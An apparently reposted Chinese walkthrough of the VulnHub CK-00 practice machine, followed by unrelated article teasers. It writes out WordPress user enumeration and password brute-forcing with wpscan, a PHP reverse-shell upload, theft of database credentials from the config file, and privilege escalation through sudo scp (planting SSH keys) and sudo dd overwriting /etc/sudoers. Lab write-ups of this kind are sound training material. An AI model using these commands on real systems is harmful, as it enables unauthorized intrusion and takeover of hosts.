CK-00靶机详解

CK-00靶机详解

靶场下载地址:https://download.vulnhub.com/ck/CK-00.zip

这个靶场扫描到ip打开后发现主页面css是有问题的,一般这种情况就是没有配置域名解析。

我们网站主页右击查看源代码,发现一个域名。

image-20230725205856051

把域名添加到我们hosts文件中。

image-20230725205950458

目录扫描时候发现这是一个wordpress的网站,两个登陆页面,都是一样的。

image-20230725205830886

wpscan可以扫描出wordpress的登陆用户名。

wpscan --url http://ck --enumerate u

image-20230725210142587

这时候我们扫出来一个用户名叫做admin

image-20230725210158051

然后根据这个用户名爆破一下。

wpscan --url http://ck -U admin -P /usr/share/wordlists/rockyou.txt

image-20230725210321398

大概两分钟密码就出来了,账号密码都是admin

image-20230725210551676

我们登陆上wordpress的后台,这个位置是一个插件,这里可以上传php文件,我们可以上传一个反弹shell。

image-20230725211702587

image-20230725211721246

这个目录通常是wordpress上传上来文件的位置。

image-20230725211531575

打开一下我们的反弹shell文件。

image-20230725211758654

kali中监听一下,这边就拿到了一个web shell。

利用python3拿到一个稳定的shell。

python3 -c "import pty;pty.spawn('/bin/bash')"

image-20230725211916041

通常wordress都有一个配置文件,里面有数据库的账号密码。

image-20230725212801749

在这里面找到一个账号密码,这个密码不是root用户的密码

image-20230725212850922

但是发现这个密码能进去bla用户。

bla_is_my_password

image-20230725214653741

sudo -l发现这个用户可以以bla1用户的身份执行scp命令。

image-20230725214822551

这里我们看一下,在bla1目录下是没有.ssh文件的,当我们用scp命令拷贝我们kali中的一个文件时候,它会先私钥验证看看能不能拷贝,所以就在这里面自动创建了一个.ssh目录。

我们可以把我们kali的authorized_keys文件拷贝到靶机的这个.ssh中去就可以免密登陆这个用户了。

image-20230725215328064

这里我们拷贝到这个新出现的.ssh目录中去。

sudo -u bla1 /usr/bin/scp root@192.168.102.129:/root/.ssh/authorized_keys .ssh/

image-20230725221244148

然后用我们kali的私钥就可以登陆bla1用户了

image-20230725221310028

sudo -l后发现bla1用户可以免密执行ck-00用户的rbash.

这里我们就可以拿到ck-00用户的rbash了。

image-20230725221416628

拿到ck-00的rbash后sudo -l发现可以免密以root权限执行dd命令。

image-20230725222051890

dd命令可以往一个文件中写东西,以覆盖的方式。

这时候我们直接给bla用户所有的权限,写到sudoers文件中,bla用户就有全部的权限了,可以直接提权。

echo "bla  ALL=(ALL:ALL) NOPASSWD:ALL"|sudo dd of=/etc/sudoers

image-20230725222117743

我们登陆上bla用户直接提权发现拿到了root权限。

image-20230725222145786

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/15937.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

设计模式四:单例模式(Singleton)

单例模式,是一种常用的软件设计模式。在它的核心结构中只包含一个被称为单例的特殊类。 通过单例模式可以保证系统中,应用该模式的类一个类只有一个实例。即一个类只有一个对象实例。 单例模式是设计模式中最简单的形式之一。这一模式的目的是使得类的一…

Mac 终端快捷键设置:如何给 Mac 中的 Terminal 设置 Ctrl+Alt+T 快捷键快速启动

Mac 电脑中正常是没有直接打开终端命令行的快捷键指令的,但可以通过 commandspace 打开聚焦搜索,然后输入 ter 或者 terminal 全拼打开。但习惯了 linux 的同学会觉得这个操作很别扭。于是我们希望能通过键盘按键直接打开。 操作流程如下: 1…

Docker 安全及日志管理

目录 前言: 一:Docker 容器与虚拟机的区别 1. 隔离与共享 2. 性能与损耗 二:Docker 存在的安全问题 1.Docker 自身漏洞 2.Docker 源码问题 三:Docker 架构缺陷与安全机制 1. 容器之间的局域网攻击 2. DDoS 攻击耗尽资…

《MapboxGL 基础知识点》- 地图监听事件

添加地图监听事件 使用方法 map.on map.on(type, layerIds, listener) 例如 map.on(mouseup, onMouseup);function onMouseup(e) {// mouseupconsole.log(e.type); } 取消地图监听事件 使用方法 map.off map.off(type, layerIds, listener) 例如: map.off(…

MyBatis小记_one

目录 什么是框架 1.框架的概述 2.框架要解决的问题 3. 软件开发的分层重要性 4.分层开发的常见框架 MyBatis 框架概述 JDBC 编程的回顾 JDBC 问题分析 MyBatis 框架快速入门 1.官网下载MyBatis框架jar包 2.搭建MyBatis 开发环境 3. 编写持久层接口的映射文件 IUserD…

HTML笔记(1)

介绍 浏览器中内置了HTML的解析引擎,通过解析标记语言来展现网页;HTML标签都是预定义好的;Java工程师:后台代码的编写,和数据库打交道,把数据给网页前端的工程师;网页前端工程师:写H…

C++信号量与共享内存实现进程间通信

关于信号量和共享内存的相关知识可参考下面链接: 进程间通信方式介绍_夜雨听萧瑟的博客-CSDN博客 C 创建共享内存_c共享内存_夜雨听萧瑟的博客-CSDN博客 信号量SytemV与Posix信号量的介绍与用法_夜雨听萧瑟的博客-CSDN博客 直接上代码,代码如下&#…

记一次Apache HTTP Client问题排查

现象 通过日志查看,存在两种异常情况。第一种:开始的时候HTTP请求会报超时异常。 762663363 [2023-07-21 06:04:25] [executor-64] ERROR - com.xxl.CucmTool - CucmTool|sendRisPortSoap error,url:https://xxxxxx/realtimeservice/services/RisPort o…

【C语言】通讯录2.0 (动态增长版)

前言 通讯录是一种记录联系人信息的工具,包括姓名、电话号码、电子邮件地址、住址等。 文章的一二三章均于上一篇相同,可以直接看第四章改造内容。 此通讯录是基于通讯录1.0(静态版)的基础上进行改进,请先看系列文字第…

自动化测试:让软件测试更高效更愉快!

谈谈那些实习测试工程师应该掌握的基础知识(一)_什么时候才能变强的博客-CSDN博客https://blog.csdn.net/qq_17496235/article/details/131839453谈谈那些实习测试工程师应该掌握的基础知识(二)_什么时候才能变强的博客-CSDN博客h…

css 动画之旋转视差

序&#xff1a;网上看到的一个例子&#xff0c;做一下 效果图&#xff1a; 代码&#xff1a; <style>.content{width: 300px;height: 300px;margin: 139px auto;display: grid;grid-template-columns: repeat(3,1fr);grid-template-rows: repeat(3,1fr);grid-template:…

Python 进阶(六):文件读写(I/O)

❤️ 博客主页&#xff1a;水滴技术 &#x1f338; 订阅专栏&#xff1a;Python 入门核心技术 &#x1f680; 支持水滴&#xff1a;点赞&#x1f44d; 收藏⭐ 留言&#x1f4ac; 文章目录 1. 打开文件2. 读取文件2.1 逐行读取文件2.2 读取所有行 3. 写入文件3.1 向文件中写入…

从0到1开发go-tcp框架【1-搭建server、封装连接与业务绑定、实现基础Router、抽取全局配置文件】

从0到1开发go-tcp框架【1-搭建server、封装连接与业务绑定、实现基础Router】 本期主要完成对Server的搭建、封装连接与业务绑定、实现基础Router&#xff08;处理业务的部分&#xff09;、抽取框架的全局配置文件 从配置文件中读取数据&#xff08;服务器监听端口、监听IP等&a…

在CSDN学Golang云原生(Kubernetes集群安全)

一&#xff0c;ABAC授权模式 Kubernetes ABAC&#xff08;Attribute-Based Access Control&#xff09;授权模式是一种基于属性的访问控制模型&#xff0c;它可以根据用户或组的属性决定是否允许他们访问 Kubernetes 集群中的资源。 在使用 ABAC 授权模式时&#xff0c;管理员…

汇编语言基础知识

目录 前言&#xff1a; 汇编语言的产生 汇编语言的组成 内存 指令和数据 cpu对内存的读写操作 地址总线 数据总线 控制总线 内存地址空间 前言&#xff1a; 汇编语言是直接在硬件之上工作的 编程语言&#xff0c;我们首先了解硬件系统的机构&#xff0c;才能有效地应用…

C/C++多线程操作

文章目录 多线程C创建线程join 和detachthis_thread线程操作锁lock_guardunique_lock 条件变量 condition_variablewaitwaitfor C语言线程创建线程同步 参考 多线程 传统的C&#xff08;C11标准之前&#xff09;中并没有引入线程这个概念&#xff0c;在C11出来之前&#xff0c…

PyTorch Lightning教程四:超参数的使用

如果需要和命令行接口进行交互&#xff0c;可以使用Python中的argparse包&#xff0c;快捷方便&#xff0c;对于Lightning而言&#xff0c;可以利用它&#xff0c;在命令行窗口中&#xff0c;直接配置超参数等操作&#xff0c;但也可以使用LightningCLI的方法&#xff0c;更加轻…

WPF实战学习笔记22-添加自定义询问窗口

添加自定义询问窗口 详细代码&#xff1a;https://github.com/DongLiqiang/Mytodo/commit/221de6b2344d5c861f1d3b2fbb2480e3e3b35c26 添加自定义询问窗口显示方法 修改文件Mytodo.Extensions.DialogExtension 添加内容&#xff0c;类中添加内容 /// <summary> /// …

【编译】gcc make cmake Makefile CMakeList.txt 区别

文章目录 一 关系二 gcc2.1 编译过程2.2 编译参数2.3 静态库和动态库1 后缀名2 联系与区别 2.4 GDB 调试器1 常用命令 三 make、makefile四 cmake、cmakelist4.1 语法特性4.2 重要命令4.2 重要变量4.3 编译流程4.4 两种构建方式 五 Vscode5.0 常用快捷键5.1 界面5.2 插件5.3 .v…

使用 docker 一键部署 MySQL

目录 1. 前期准备 2. 导入镜像 3. 创建部署脚本文件 4. MySQL 服务器配置文件模板 5. 执行脚本创建容器 6. 后续工作 7. 基本维护 1. 前期准备 新部署前可以从仓库&#xff08;repository&#xff09;下载 MySQL 镜像&#xff0c;或者从已有部署中的镜像生成文件&#x…